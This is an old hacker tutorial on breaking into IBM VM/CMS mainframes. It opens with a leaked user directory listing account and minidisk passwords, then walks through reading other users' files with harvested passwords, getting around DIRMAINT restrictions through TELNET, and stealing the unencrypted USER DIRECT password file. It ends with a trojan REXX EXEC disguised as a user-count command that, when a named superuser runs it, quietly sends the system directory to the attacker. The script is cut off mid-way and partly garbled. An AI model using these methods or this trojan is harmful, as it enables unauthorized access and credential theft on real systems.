LINK OPERATNS 193 193 RR
|
|
MDISK 191 3380 783 001 VMPK01 MR RCPRM WCPRM MCPRM 03131808
|
|
MDISK 192 3380 098 007 VMSRES MR ALL WCPRM MCPRM 03131808
|
|
MDISK 291 3380 784 001 VMPK01 MR RCPRM WCPRM MCPRM 03131808
|
|
*
|
|
USER OP1 OP1 1M 13M ABCDEFG 64 ON ON ON ON
|
|
*
|
|
* 5664318 VM/IPF
|
|
*
|
|
INCLUDE EXPPROF
|
|
LINK MAINT 300 300 RR
|
|
MDISK 191 3380 058 001 VMSRES MR ROP1 WOP1 MOP1 03131808
|
|
*
|
|
USER VMUTIL VMUTIL 512K 2M ABDEG 64 ON ON ON ON
|
|
*
|
|
* 5664318 VM/IPF
|
|
*
|
|
INCLUDE EXPPROF
|
|
IPL CMS
|
|
OPTION ECMODE
|
|
LINK MAINT 300 300 RR
|
|
MDISK 191 3380 059 001 VMSRES MR RVMUTIL WVMUTIL MVMUTIL 03131808
|
|
*
|
|
USER IPFSERV IPFSERV 2M 16M G 64 ON ON ON ON
|
|
*
|
|
* 5664318 VM/IPF
|
|
*
|
|
IPL CMS
|
|
CONSOLE 009 3215 T MAINT
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 123 123 MW
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 191 192 RR
|
|
LINK MAINT 193 193 RR
|
|
LINK MAINT 194 194 RR
|
|
LINK MAINT 19D 19D RR
|
|
LINK MAINT 19E 19E RR
|
|
LINK MAINT 294 294 RR
|
|
LINK MAINT 295 295 RR
|
|
LINK MAINT 300 300 RR
|
|
MDISK 191 3380 060 001 VMSRES MR RIPFSERV WIPFSERV MIPFSERV 03131808
|
|
*
|
|
USER ISPVM ISPVM 1M 10M EG 64 ON ON ON ON
|
|
*
|
|
* 5664282 ISPF
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 104 USER04
|
|
MDISK 191 3380 548 005 VMSRES MR RISPVM WISPVM MISPVM 03131808
|
|
MDISK 192 3380 110 054 VMSRES MR RISPVM WISPVM MISPVM 03131808
|
|
*
|
|
USER NETVIEW NETVIEW 5M 16M G 64 ON ON ON ON
|
|
*
|
|
* 5664175 NETVIEW
|
|
*
|
|
ACCOUNT NETVIEW GCS
|
|
OPTION ECMODE
|
|
IUCV ANY P M 0
|
|
IUCV *LOGREC
|
|
IPL GCS PARM AUTOLOG
|
|
CONSOLE 01F 3215
|
|
SPOOL 00C 2540 READER A
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 334 191 RR
|
|
LINK VTAM 191 291 RR
|
|
LINK VTAM 29A 29A RR
|
|
LINK MAINT 595 595 RR
|
|
MDISK 198 3380 166 034 VMGCS1 WR RNETVIEW WNETVIEW MNETVIEW 03131808
|
|
*
|
|
USER PRODBM PRODBM 1M 4M G 64 ON ON ON ON
|
|
*
|
|
* 5664309 PROFS DATABASE MANAGER
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 250 PRODBM
|
|
OPTION MAXCONN 2000
|
|
IUCV ALLOW
|
|
LINK SYSADMIN 399 399 RR
|
|
MDISK 161 3380 169 011 PROFPK MR RDBM WDBM MDBM 03131808
|
|
MDISK 191 3380 165 004 PROFPK MR RDBM WDBM MDBM 03131808
|
|
MDISK 5FD 3380 206 013 PROFPK MR RDBM WDBM MDBM 03131808
|
|
MDISK 5FE 3380 193 013 PROFPK MR RDBM WDBM MDBM 03131808
|
|
MDISK 5FF 3380 180 013 PROFPK MR RDBM WDBM MDBM 03131808
|
|
*
|
|
USER PROMAIL PROMAIL 1M 2M G 64 ON ON ON ON
|
|
*
|
|
* 5664309 PROFS DISTRIBUTION MANAGER
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 250 PROMAIL
|
|
LINK PRODBM 191 395 RR
|
|
LINK SYSADMIN 399 399 RR
|
|
MDISK 151 3380 092 004 PROFPK MR RMAIL WMAIL MMAIL 03131808
|
|
MDISK 191 3380 084 008 PROFPK MR RMAIL WMAIL MMAIL 03131808
|
|
*
|
|
USER PROCAL PROCAL 1M 4M G 64 ON ON ON ON
|
|
*
|
|
* 5664309 PROFS CALENDAR MANAGER
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 250 PROCAL
|
|
LINK PRODBM 191 395 RR
|
|
LINK SYSADMIN 398 398 RR
|
|
LINK SYSADMIN 399 399 RR
|
|
MDISK 191 3380 096 004 PROFPK MR RCAL WCAL MCAL 03131808
|
|
MDISK 5FB 3380 100 013 PROFPK MR RCAL WCAL MCAL 03131808
|
|
MDISK 5FC 3380 113 013 PROFPK MR RCAL WCAL MCAL 03131808
|
|
MDISK 5FD 3380 126 013 PROFPK MR RCAL WCAL MCAL 03131808
|
|
MDISK 5FE 3380 139 013 PROFPK MR RCAL WCAL MCAL 03131808
|
|
MDISK 5FF 3380 152 013 PROFPK MR RCAL WCAL MCAL 03131808
|
|
*
|
|
USER SYSADMIN NOLOG 1M 16M EG 64 ON ON ON ON
|
|
*
|
|
* 5664309 PROFS ADMINISTRATOR
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 250 SYSADMIN
|
|
LINK PRODBM 161 161 RR
|
|
LINK PRODBM 191 4FA RR
|
|
LINK PRODBM 5FD 5FD RR
|
|
LINK PRODBM 5FE 5FE RR
|
|
LINK PRODBM 5FF 5FF RR
|
|
MDISK 191 3380 001 011 PROFPK MR RADMIN WADMIN MADMIN 03131808
|
|
MDISK 298 3380 012 029 PROFPK MR RADMIN WADMIN MADMIN 03131808
|
|
MDISK 398 3380 041 019 PROFPK MR RADMIN WADMIN MADMIN 03131808
|
|
MDISK 399 3380 060 024 PROFPK MR RADMIN WADMIN MADMIN 03131808
|
|
MDISK 397 3380 219 002 PROFPK MR ALL WADMIN MADMIN 03131808
|
|
*
|
|
USER SFCM1 SFCM1 3M 5M BDG 64 ON ON ON ON
|
|
*
|
|
* 5664198 PSF
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 100 PSF
|
|
OPTION ACCT
|
|
IUCV *SPL
|
|
LINK PDM470 191 193 RR
|
|
LINK PDMREM1 191 194 RR
|
|
LINK PSFMAINT 191 291 RR
|
|
LINK PSFMAINT 193 293 RR
|
|
LINK PSFMAINT 194 294 RR
|
|
MDISK 191 3380 839 020 VMSRES MR RSFCM1 WSFCM1 03131808
|
|
*
|
|
USER PSFMAINT PSFMAINT 3M 16M ABCDEFG 64 ON ON ON ON
|
|
*
|
|
* 5664198 PSF MAINTENANCE
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 1 SYSPROG
|
|
MDISK 191 3380 814 011 VMSRES MR RPSFMAIN WPSFMAIN 03131808
|
|
MDISK 193 3380 825 004 VMSRES MR RPSFMAIN WPSFMAIN 03131808
|
|
MDISK 194 3380 829 010 VMSRES MR RPSFMAIN WPSFMAIN 03131808
|
|
*
|
|
USER PDM470 PDM470 4M 5M BG 64 ON ON ON ON
|
|
*
|
|
* 5664198 PSF 3800 PDM
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 100 PSF
|
|
OPTION ACCT
|
|
IUCV *SPL
|
|
*DEDICATE 470 470
|
|
LINK SFCM1 191 193 RR
|
|
LINK PSFMAINT 191 291 RR
|
|
LINK PSFMAINT 194 294 RR
|
|
MDISK 191 3380 809 005 VMSRES MR RPDM470 WPDM470 03131808
|
|
*
|
|
USER PDMREM1 PDMREM1 4M 5M BG 64 ON ON ON ON
|
|
*
|
|
* 5664198 PSF 3820 PDM
|
|
*
|
|
ACCOUNT 100 PSF
|
|
OPTION ACCT ECMODE
|
|
IPL GCS PARM AUTOLOG
|
|
IUCV *SPL
|
|
CONSOLE 009 3215
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19E 19E RR
|
|
LINK MAINT 595 595 RR
|
|
LINK SFCM1 191 193 RR
|
|
LINK PSFMAINT 191 291 RR
|
|
LINK PSFMAINT 194 294 RR
|
|
MDISK 191 3380 804 005 VMSRES MR RPDMREM1 WPDMREM1 03131808
|
|
*
|
|
USER PVM PVM 1024K 2M BG 50 ON ON ON ON
|
|
*
|
|
* 5748RC1 VM PASS-THROUGH FACILITY
|
|
*
|
|
INCLUDE EXPPROF
|
|
OPTION ECMODE
|
|
LINK MAINT 193 193 RR
|
|
LINK MAINT 36E 191 MR
|
|
*
|
|
USER RSCS RSCS 1M 2M BG 64 ON ON ON ON
|
|
*
|
|
* 5748XP1 RSCS V1
|
|
*
|
|
ACCOUNT 15 SYSTEM
|
|
OPTION ACCT ECMODE
|
|
IPL 191
|
|
CONSOLE 009 3215
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 193 193 RR
|
|
LINK MAINT 19E 19E RR
|
|
LINK MAINT 19D 19D RR
|
|
LINK MAINT 49E 49E RR
|
|
MDISK 191 3380 105 002 VMSRES MR RRSCS WRSCS MRSCS 03131808
|
|
*
|
|
USER RSCSV2 RSCSV2 2M 4M BG 64 ON ON ON ON
|
|
*
|
|
* 5664188 RSCS (VERSION 2)
|
|
*
|
|
ACCOUNT 15 SYSTEM
|
|
OPTION ECMODE ACCT BMX VCUNOSHR
|
|
IPL GCS PARM AUTOLOG
|
|
CONSOLE 01F 3215 T OPERATOR
|
|
SPOOL 00C 2540 READER A
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 595 595 RR
|
|
LINK MAINT 59F 191 RR
|
|
*
|
|
USER SMART SMART 2048K 2M CEG 64 ON ON ON ON
|
|
*
|
|
* 5796PNA VM REAL TIME MONITOR SYSTEM
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 999
|
|
LINK MAINT 319 319 RR
|
|
MDISK 191 3380 848 026 VMPK01 MR RSMART WSMART MSMART 03131808
|
|
*
|
|
USER SQLDBA SQLDBA 6M 6M G 64 ON OFF OFF \
|
|
*
|
|
* 5748XXJ SQL/DS ADMINISTRATOR
|
|
*
|
|
ACCOUNT 26
|
|
OPTION MAXCONN 25
|
|
IUCV ALLOW
|
|
IUCV *IDENT SQLDBA GLOBAL
|
|
IPL CMS
|
|
CONSOLE 009 3215 T OPERATOR
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19D 19D RR
|
|
MDISK 191 3380 001 010 SQLPK W 03131808
|
|
MDISK 193 3380 011 035 SQLPK R RSQL WSQL 03131808
|
|
MDISK 195 3380 046 013 SQLPK RR RSQL WSQL MSQL 03131808
|
|
MDISK 200 3380 059 034 SQLPK R RSQL WSQL 03131808
|
|
MDISK 201 3380 093 011 SQLPK R RSQL WSQL 03131808
|
|
MDISK 202 3380 104 100 SQLPK R RSQL WSQL 03131808
|
|
*
|
|
USER SQLUSER SQLUSER 2M 2M G 64 ON ON ON ON
|
|
*
|
|
* 5748XXJ SQL/DS USER MACHINE
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 27
|
|
OPTION REALTIMER
|
|
IUCV SQLDBA
|
|
LINK SQLDBA 195 195 RR
|
|
MDISK 191 3380 204 003 SQLPK W 03131808
|
|
*
|
|
USER VMARCH VMARCH 2M 4M BEG 64 ON ON ON ON
|
|
*
|
|
* 5664291 VMBACKUP
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 999
|
|
OPTION ACCT ECMODE
|
|
LINK MAINT 123 1A0 RR
|
|
MDISK 191 3380 001 011 VMPK02 MR RVMARCH WVMARCH MVMARCH 03131808
|
|
MDISK 193 3380 012 007 VMPK02 MR RVMARCH WVMARCH MVMARCH 03131808
|
|
MDISK 100 3380 019 007 VMPK02 MR RVMARCH WVMARCH MVMARCH 03131808
|
|
MDISK 101 3380 026 007 VMPK02 MR RVMARCH WVMARCH MVMARCH 03131808
|
|
MDISK 200 3380 033 007 VMPK02 MR RVMARCH WVMARCH MVMARCH 03131808
|
|
*
|
|
USER VMBACKUP VMBACKUP 2M 16M BEG 64 ON ON ON ON
|
|
*
|
|
* 5664291 VMBACKUP
|
|
*
|
|
ACCOUNT 999
|
|
OPTION ACCT BMX ECMODE
|
|
IPL CMS
|
|
CONSOLE 009 3215
|
|
SPOOL 001 2540 READER *
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH
|
|
SPOOL 0D0 2540 PUNCH
|
|
SPOOL 0D1 2540 PUNCH
|
|
SPOOL 00E 1403
|
|
SPOOL 0E0 1403
|
|
SPOOL 0E1 1403
|
|
SPOOL 0E2 1403
|
|
SPOOL 0E3 1403
|
|
SPOOL 0E4 1403
|
|
SPOOL 0E5 1403
|
|
SPOOL 0E6 1403
|
|
SPOOL 0E7 1403
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19E 19E RR
|
|
LINK MAINT 123 1A0 RR
|
|
MDISK 191 3380 040 006 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU 03131808
|
|
MDISK 192 3380 046 003 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU 03131808
|
|
MDISK 193 3380 049 003 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU 03131808
|
|
MDISK 194 3380 052 044 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU 03131808
|
|
*
|
|
USER VMBSYSAD VMBSYSAD 1M 4M BG 64 ON ON ON ON
|
|
*
|
|
* 5664291 VMBACKUP
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 999
|
|
LINK MAINT 191 124 RR
|
|
LINK VMBACKUP 194 294 RR RVMBACKU
|
|
LINK VMBACKUP 193 293 RR RVMBACKU
|
|
LINK MAINT 123 1A0 RR
|
|
MDISK 191 3380 096 005 VMPK02 MR RVMBSYSA WVMBSYSA MVMBSYSA 03131808
|
|
MDISK 192 3380 101 009 VMPK02 MR RVMBSYSA WVMBSYSA MVMBSYSA 03131808
|
|
*
|
|
USER DEMO1 DEMO1 4M 4M G 64 ON ON ON ON
|
|
*
|
|
* 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT DEMO1 DEMO1
|
|
IUCV SQLDBA
|
|
LINK MAINT 319 319 RR
|
|
LINK MAINT 31A 31A RR
|
|
LINK MAINT 322 322 RR
|
|
LINK MAINT 326 326 RR
|
|
LINK MAINT 34A 59A RR
|
|
LINK SQLDBA 195 195 RR
|
|
LINK SYSADMIN 399 399 RR
|
|
MDISK 191 3380 107 003 VMSRES MR RDEMO1 WDEMO1 MDEMO1 03131808
|
|
*
|
|
USER DEMO2 DEMO2 4M 4M G 64 ON ON ON ON
|
|
*
|
|
* 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT DEMO2 DEMO2
|
|
IUCV SQLDBA
|
|
LINK MAINT 319 319 RR
|
|
LINK MAINT 31A 31A RR
|
|
LINK MAINT 322 322 RR
|
|
LINK MAINT 326 326 RR
|
|
LINK MAINT 34A 59A RR
|
|
LINK SQLDBA 195 195 RR
|
|
LINK SYSADMIN 399 399 RR
|
|
MDISK 191 3380 859 003 VMSRES MR RDEMO2 WDEMO2 MDEMO2 03131808
|
|
*
|
|
USER DEMO3 DEMO3 4M 4M G 64 ON ON ON ON
|
|
*
|
|
* 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT DEMO3 DEMO3
|
|
IUCV SQLDBA
|
|
LINK MAINT 319 319 RR
|
|
LINK MAINT 31A 31A RR
|
|
LINK MAINT 322 322 RR
|
|
LINK MAINT 326 326 RR
|
|
LINK MAINT 34A 59A RR
|
|
LINK SQLDBA 195 195 RR
|
|
LINK SYSADMIN 399 399 RR
|
|
MDISK 191 3380 862 003 VMSRES MR RDEMO3 WDEMO3 MDEMO3 03131808
|
|
*
|
|
USER DEMO4 DEMO4 4M 4M G 64 ON ON ON ON
|
|
*
|
|
* 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT DEMO4 DEMO4
|
|
IUCV SQLDBA
|
|
LINK MAINT 319 319 RR
|
|
LINK MAINT 31A 31A RR
|
|
LINK MAINT 322 322 RR
|
|
LINK MAINT 326 326 RR
|
|
LINK MAINT 34A 59A RR
|
|
LINK SQLDBA 195 195 RR
|
|
LINK SYSADMIN 399 399 RR
|
|
MDISK 191 3380 865 003 VMSRES MR RDEMO4 WDEMO4 MDEMO4 03131808
|
|
*
|
|
USER VMTAPE VMTAPE 1M 2M BCEG 64 ON ON ON ON
|
|
*
|
|
* 5664292 VMTAPE
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 999
|
|
OPTION BMX ECMODE ACCT
|
|
MDISK 191 3380 110 005 VMPK02 MR RVMTAPE WVMTAPE MVMTAPE 03131808
|
|
MDISK 200 3380 115 007 VMPK02 MR RVMTAPE WVMTAPE MVMTAPE 03131808
|
|
MDISK 300 3380 122 007 VMPK02 MR RVMTAPE WVMTAPE MVMTAPE 03131808
|
|
*
|
|
USER VMTLIBR VMTLIBR 1M 3M G 64 ON ON ON ON
|
|
*
|
|
* 5664292 VMTAPE
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 999
|
|
LINK VMTAPE 191 193 MR
|
|
LINK VMTAPE 200 200 MW
|
|
LINK VMTAPE 300 300 MW
|
|
MDISK 191 3380 129 005 VMPK02 MR RVMTLIBR WVMTLIBR MVMTLIBR 03131808
|
|
MDISK 192 3380 134 007 VMPK02 MR RVMTLIBR WVMTLIBR MVMTLIBR 03131808
|
|
*
|
|
USER VMMAP VMMAP 2M 4M G 64 ON ON ON ON
|
|
*
|
|
* 5664191 VMMAP
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 999
|
|
LINK MAINT 193 193 RR
|
|
MDISK 191 3380 639 024 VMSRES MR RVMMAP WVMMAP MVMMAP 03131808
|
|
*
|
|
USER VTAM VTAM 5M 16M G 64 ON ON ON ON
|
|
*
|
|
* 5664280 VTAM
|
|
*
|
|
ACCOUNT VTAM GCS
|
|
OPTION ECMODE DIAG98 MAXCONN 400
|
|
IUCV *CCS P M 10
|
|
IUCV ANY P M 0
|
|
IPL GCS PARM AUTOLOG
|
|
CONSOLE 01F 3215
|
|
SPOOL 00C 2540 READER A
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 298 191 RR
|
|
LINK MAINT 29A 29A RR
|
|
LINK MAINT 595 595 RR
|
|
*
|
|
USER VM3812 VM3812 3M 4M BG 64 ON ON ON ON
|
|
*
|
|
* 5798DTE VM3812 SERVICE MACHINE
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 15 SYSTEM
|
|
MDISK 191 3380 813 004 VMPK01 MR RVM3812 WVM3812 MVM3812 03131808
|
|
MDISK 192 3380 817 007 VMPK01 MR RVM3812 WVM3812 MVM3812 03131808
|
|
MDISK 193 3380 824 020 VMPK01 MR ALL WVM3812 03131808
|
|
* ADD USER ID ------
|
|
USER VSEMAN VSE 2M 16M ABCDEFG 42 ON ON ON ON
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 999 SYSTEM
|
|
MDISK 191 3380 001 030 EDMD01 MR VSE 03131808
|
|
MDISK 192 3380 873 012 VMSRES MR VSE 03131808
|
|
USER PENG PENG 2M 16M ABCDEFG 42 ON ON ON ON
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 999 SYSTEM
|
|
MDISK 191 3380 553 010 VMSRES MR PENG PENG 03131808
|
|
*
|
|
USER MOESERV MOESERV 2M 16M G 42 ON ON ON ON
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 996 MOE
|
|
MDISK 191 3380 544 002 VMPK01 MR MOESERV MOESERV 03131808
|
|
*
|
|
USER VTAMUSER CCC 2M 8M G 64 ON ON ON ON
|
|
*
|
|
* 5668814 CSP
|
|
*
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 101
|
|
MDISK 191 3380 134 032 VMPK01 MW VTAM1 WVTAM1 MVTAM1 03131808
|
|
USER IDMSSE IDMS 2M 8M G 64 ON ON ON ON
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 101
|
|
MDISK 191 3380 519 005 VMPK01 MW VTAM1 WVTAM1 MVTAM1 03131808
|
|
MDISK 192 3380 524 020 VMPK01 MW VTAM1 WVTAM1 MVTAM1 03131808
|
|
|
|
===============================================================================
|
|
|
|
If you need an explanation about these two tables, you should look at it like
|
|
this:
|
|
|
|
|------User ID
|
|
| |-------That User ID's password
|
|
^ ^
|
|
USER IDMSSE IDMS 2M 8M G 64 ON ON ON ON
|
|
^ ^ ^
|
|
| | |---Its privilege grade
|
|
| |--Its maximum memory storage
|
|
|
|
|
|----Its default memory storage
|
|
|
|
INCLUDE EXPPROF <-----What you see when you log on
|
|
ACCOUNT 101
|
|
MDISK 191 3380 519 005 VMPK01 MW VTAM1 WVTAM1 MVTAM1
|
|
^ ^ ^ ^
|
|
| | | |---Minidisk mult pass
|
|
| | |---Minidisk write pass
|
|
| |---Minidisk read pass
|
|
|--Its minidisk
|
|
|
|
MDISK 192 3380 524 020 VMPK01 MW VTAM1 WVTAM1 MVTAM1
|
|
|
|
===============================================================================
|
|
|
|
Luckily, I have tested the second table in 4 VM systems and it works. May you
|
|
be lucky too!
|
|
|
|
Of course, since all of us are general users, the first thing to know is how to
|
|
get privileges by trying a password or by accident by getting privileged users'
|
|
passwords.
|
|
|
|
While CP/CMS uses passwords to control performance, it must store some
|
|
passwords in the REXX command language (EXEC files). It looks like this:
|
|
|
|
CP LINK VTAMUSER 191 121 RR VTAM1
|
|
|
|
If you have succeeded in linking that minidisk then:
|
|
|
|
AC 121 B
|
|
FILEL * * B
|
|
|
|
Then you can see all of the files owned by VTAMUSER. Usually people are lazy
|
|
enough to remember too many passwords, so to read the passwords. It may be its
|
|
CP pass too! TRY IT!!!
|
|
|
|
But IBM is not so stupid as to let any user with privileges open accounts
|
|
randomly. It limits a maximum of 8 superusers to be able to do it. You may
|
|
find it in:
|
|
|
|
DIRMAINT DATA Y2
|
|
|
|
Only these DIRM-STAFF can open accounts from the console. If another user logs
|
|
on from a terminal, he will be logged out immediately even though he knew the
|
|
password. And only these STAFF have 2 modes of operation to use:
|
|
|
|
DIRM
|
|
|
|
One is general user mode and the other is operation mode (Privilege operation)
|
|
so you have to cheat the O.S. to think that you are NOT logged in from a
|
|
terminal. Our way is to use TELNET. Usually this package is named TCPIP. Do
|
|
this:
|
|
|
|
TELNET yourhost
|
|
|
|
It will request you logon again. Then, if you logon with the superuser ID &
|
|
password, the O.S. will not recognize that you are from a terminal and will let
|
|
you in!! The most important thing is that IBM stores its user IDs & passwords
|
|
in a file:
|
|
|
|
USER DIRECT
|
|
|
|
Usually, this file is stored on DIRMAINT's minidisk and it is a text file!!! I
|
|
do not know why, but it actually is not encrypted!!!! Incredible to believe...
|
|
|
|
Once you have this file, you will know all users' passwords and all information
|
|
about all users' IDs and I think it is rude to open new accounts! Poor me!
|
|
I've done this and lost privs 3 times now. While there is a way to get back
|
|
your privs, first you need find a privileged ID so that you can write your file
|
|
in it. Then, write a EXEC file into it. This file's name must be a most
|
|
common command that any one will issue. If the general user uses it, nothing
|
|
happens, but if a superuser issues it, then it will do something for you! Here
|
|
is a example:
|
|
|
|
Please note that wherever you see (cut), it means that the line was too long
|
|
and had to be split. Whenever you see (cut), take the line below the line that
|
|
it is on and paste it on the end of the (cut) line (removing the (cut) in the
|
|
process).
|
|
|
|
-----------------------------------Cut Here------------------------------------
|
|
/* DISPLAY THE NUMBER OF SPECIFIED USERS LOGGED ON */
|
|
TRACE O
|
|
USER = 0
|
|
SW = 1
|
|
S = 1
|
|
PARSE UPPER ARG NAM GARBAGE
|
|
IF NAM = ' ' THEN signal qname
|
|
PO = INDEX(NAM,'*')
|
|
IF PO = 0 THEN DO
|
|
Q NAM
|
|
EXIT
|
|
END
|
|
T = PO - 1
|
|
IF T= 0 THEN signal qname
|
|
NALL = SUBSTR(NAM,1,T)
|
|
EXECIO '* CP (STRING Q N '
|
|
NUMQ = QUEUED()
|
|
DO N = 1 TO NUMQ
|
|
PULL STR
|
|
PARSE VALUE STR with NA.N '-' LA.N ',' NB.N '-' LB.N ',' NC.N '-' LC.N (cut)
|
|
','ND.N '-' LD.N
|
|
na.n=substr(strip(na.n,'L'),1,8)
|
|
nb.n=substr(strip(nb.n,'L'),1,8)
|
|
nc.n=substr(strip(nc.n,'L'),1,8)
|
|
nd.n=substr(strip(nd.n,'L'),1,8)
|
|
END
|
|
DO N = 1 TO NUMQ
|
|
IF LA.N ^= DSC & LA.N ^= ' ' & SUBSTR(NA.N,1,T)=NALL & (cut)
|
|
SUBSTR(space(NA.N),1,4)^='LOGO' & SPACE
|
|
A.S = NA.N||'-'||LA.N||',' ; S=S+1 ; USER=USER+1; END;
|
|
IF LB.N ^= DSC & LB.N ^= ' ' & SUBSTR(NB.N,1,T)=NALL & (cut)
|
|
SUBSTR(space(NB.N),1,4)^='LOGO' & SPACE
|
|
A.S = NB.N||'-'||LB.N||',' ; S=S+1 ; USER=USER+1; END;
|
|
IF LC.N ^= DSC & LC.N ^= ' ' & SUBSTR(NC.N,1,T)=NALL & (cut)
|
|
SUBSTR(space(NC.N),1,4)^='LOGO' & SPACE
|
|
A.S = NC.N||'-'||LC.N||',' ; S=S+1 ; USER=USER+1; END;
|
|
IF LD.N ^= DSC & LD.N ^= ' ' & SUBSTR(ND.N,1,T)=NALL & (cut)
|
|
SUBSTR(space(ND.N),1,4)^='LOGO' SPACE(L
|
|
A.S = ND.N||'-'||LD.N||',' ; S=S+1 ; USER=USER+1; END;
|
|
END
|
|
CLRSCRN
|
|
call concate
|
|
SAY
|
|
MM= ' <- - - - - - - - - - - -' RIGHT(USER,3,0) ' SPECIFIED LOGON USERS - (cut)
|
|
- - - - - - - - - - ->'
|
|
say MM
|
|
SAY
|
|
SAY
|
|
EXIT
|
|
QNAME:
|
|
/* DISPLAY THE NUMBER OF USERS LOGGED ON */
|
|
USER = 0
|
|
SW = 1
|
|
S = 1
|
|
EXECIO '* CP (STRING Q N '
|
|
IF USERID() ='MAINT' THEN SIGNAL NJ /*super user id */
|
|
IF USERID() ='JASMIN' THEN SIGNAL NJ /*super user id */
|
|
IF USERID() ='LIU' THEN SIGNAL NJ /*supr userid */
|
|
IF USERID() ='PMAINT' THEN SIGNAL NJ /*super user id*/
|
|
IF USERID() ='MOESERV' THEN SIGNAL NJ /* super user id*/
|
|
SIGNAL JP
|
|
NJ:
|
|
CP SET IMSG OFF
|
|
CP SET MSG OFF
|
|
EXEC DIRMAINT GET DIRMAINT NOLOCK
|
|
SLEEP 2 SEC
|
|
CP TRAN USERID() ALL yourid /* to your own id*/
|
|
CP SET IMSG ON
|
|
CP SET MSG ON
|
|
JP:
|
|
NUMQ = QUEUED()
|
|
DO N = 1 TO NUMQ
|
|
PULL STR
|
|
PARSE VALUE STR with NA.N '-' LA.N ',' NB.N '-' LB.N ',' NC.N (cut)
|
|
'-' LC.N ','ND.N '-' LD.N
|
|
na.n=substr(strip(na.n,'L'),1,8)
|
|
nb.n=substr(strip(nb.n,'L'),1,8)
|
|
nc.n=substr(strip(nc.n,'L'),1,8)
|
|
nd.n=substr(strip(nd.n,'L'),1,8)
|
|
END
|
|
DO N = 1 TO NUMQ
|
|
IF LA.N ='VTAM' THEN SELECT
|
|
WHEN (S+0)//4 = 1 THEN DO
|
|
LA.N ='VTAM' THEN DO
|
|
A.S ='VSM - VTAM' ; S = S+1 ;
|
|
A.S=' ' ; S=S+1 ; A.S=' ' ; S=S+1 ; A.S =' ' ; S=S+1 ; ITERATE
|
|
END
|
|
WHEN (S+0)//4 = 2 THEN DO
|
|
A.S = ' ' ; S = S+1 ; A.S = ' ' ;S=S+1 ; A.S =' ' ; S=S+1 ;END
|
|
WHEN (S+0)//4 = 3 THEN DO;A.S =' ';S=S+1 ; A.S =' ' ; S=S+1 ;END;
|
|
WHEN (S+0)//4 = 0 THEN DO; A.S = ' ' ; S=S+1 ; END
|
|
END
|
|
IF LA.N ='VTAM' THEN DO
|
|
A.S ='VSM - VTAM' ; S = S+1 ;
|
|
A.S=' ' ; S=S+1 ; A.S=' ' ; S=S+1 ; A.S =' ' ; S=S+1 ; ITERATE
|
|
END
|
|
IF LA.N ^= DSC & LA.N ^= ' ' & SUBSTR(space(NA.N),1,4)^='LOGO' & (cut)
|
|
SPACE(LA.N)^=SPACE(NA.N) THEN
|
|
A.S = NA.N||'-'||LA.N||',' ; S=S+1 ; USER=USER+1; END;
|
|
IF LB.N ^= DSC & LB.N ^= ' ' & SUBSTR(space(NB.N),1,4)^='LOGO' & (cut)
|
|
SPACE(LB.N)^=SPACE(NB.N) THEN
|
|
A.S = NB.N||'-'||LB.N||',' ; S=S+1 ; USER=USER+1; END;
|
|
IF LC.N ^= DSC & LC.N ^= ' ' & SUBSTR(space(NC.N),1,4)^='LOGO' & (cut)
|
|
SPACE(LC.N)^=SPACE(NC.N) THEN
|
|
A.S = NC.N||'-'||LC.N||',' ; S=S+1 ; USER=USER+1; END;
|
|
